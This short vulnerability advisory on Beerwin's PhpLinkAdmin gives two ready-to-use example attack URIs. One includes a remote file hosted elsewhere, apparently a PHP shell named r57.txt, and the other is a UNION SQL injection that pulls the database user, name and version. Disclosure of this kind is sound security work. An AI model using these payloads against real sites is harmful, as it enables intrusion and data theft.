Beerwin's PhpLinkAdmin Remote File Include and Multiple SQL Injection Vulnerabilities

Beerwin's PhpLinkAdmin Remote File Include and Multiple SQL Injection Vulnerabilities

An attacker can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/path/linkadmin.php?page=http://www2.example.com/bbs/skin/zero_vote/r57.txt?
http://www.example.com/path/edlink.php?linkid=-1' union all select 1,2,3,4,concat_ws(0x3a,user(),database(),version())'--